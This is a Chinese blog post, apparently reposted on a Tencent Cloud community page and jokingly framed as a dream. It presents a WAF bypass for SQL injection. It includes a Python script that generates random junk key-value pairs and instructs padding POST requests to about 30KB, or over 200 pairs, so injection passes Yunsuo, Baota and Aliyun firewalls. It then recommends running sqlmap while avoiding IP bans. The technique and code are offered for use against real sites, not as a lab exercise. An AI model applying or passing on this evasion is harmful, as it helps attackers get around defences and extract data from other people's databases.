专栏首页HACK学习精华 | SQL注入万能Bypass技巧

精华 | SQL注入万能Bypass技巧

前言

很多同学问注入bypass的一些细节,刚好前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。

本文纯属虚构,如有雷同纯属放屁。

正文

梦里发现了一处mssql报错注入

然后发现有云锁

云锁.jpg(假装有图)

用自己写的的脚本生成垃圾数据

#coding=utf-8
import random,string
from urllib import parse
# code by yzddMr6
varname_min = 5
varname_max = 15
data_min = 20
data_max = 25
num_min = 50
num_max = 100
def randstr(length):
    str_list = [random.choice(string.ascii_letters) for i in range(length)]
    random_str = ''.join(str_list)
    return random_str

def main():
    data={}
    for i in range(num_min,num_max):
        data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))
    print('&'+parse.urlencode(data)+'&')

main()

如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。

第一次可能生成太少了,还是被云锁drop包

多粘贴几次,最后发现在数据包到30KB左右就可以正常注入了

然后就可以查数据了

测试数据

目前为止的bypass测试数据:

云锁:30KB

宝塔:30KB

阿里云:200+键值对

安全狗没测过,有空测一下

建议先抓包手工试一下到底多少垃圾数据合适,没问题之后再上sqlmap,不然容易ban ip

回答几个问题

•为什么不直接在get上加垃圾数据?•因为GET型有长度限制,有时候还没加到能bypass的程度服务器就报错。

•为什么不用一个超长字符串要用这么多键值对?•因为经过测试,超长字符串对于阿里云没用,超多垃圾键值对才有用。

•适用类型有哪些?•在梦里的测试中本方法对于市面上绝大多数waf都可以用。

最后

然后梦就醒了,收拾一下准备去工地搬砖了。

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:yzddmr6

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-02-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 爬取Google的心酸之路

    早在前段时间就尝试写过爬Google的了。当时由于解决不了验证码就删了,当然这次也没解决。验证码不能绕过,只能避免,减少遇见

    HACK学习
  • 内网渗透|Chisel内网穿透工具

    Chisel可用来搭建内网隧道,类似于常用的frp和nps之类的工具。由于目前使用的人比较少,因此对于有些杀软还不能准确的识别出该工具。chisel可以进行端口...

    HACK学习
  • Vulnhub靶机渗透-Raven:1

    爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。

    HACK学习
  • 精华 | SQL注入万能Bypass技巧

    很多同学问注入bypass的一些细节,刚好前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。

    7089bAt@PowerLi
  • 如何在浏览器中快速切换搜索引擎

    如果已经使用了默认的Google,又想切换到stackoverflow,该怎么办呢?

    编程珠玑
  • 基于Docker的Elasticsearch集群搭建

    由于默认es实例是1g,太吃内存了,我们修改一下jvm参数,每个es目录下放一个jvm.option文件:

    niceyoo
  • 设计模式 | 中介者模式及典型应用

    世界上存在着各种各样的数据库,不同数据库有各自的应用场景,对于同一份数据,最开始可能使用关系型数据库(如MySQL)进行存储查询,使用Redis作为缓存数据库,...

    小旋锋
  • Python 新手入门习题及代码

    py3study
  • 【Python 练习】随机显示不重复的单

    【题目:】创建能以随机顺序显示一组单词的程序。要求该程序能打印出所有单词,但不能重复!

    py3study
  • 在tx2上安装opencv和cuDNN

    从 https://developer.nvidia.com/rdp/cudnn-archive 这个网址下载指定的cudnn版本,这里注意如果直接google...

    用户1148523

扫码关注云+社区

领取腾讯云代金券

,,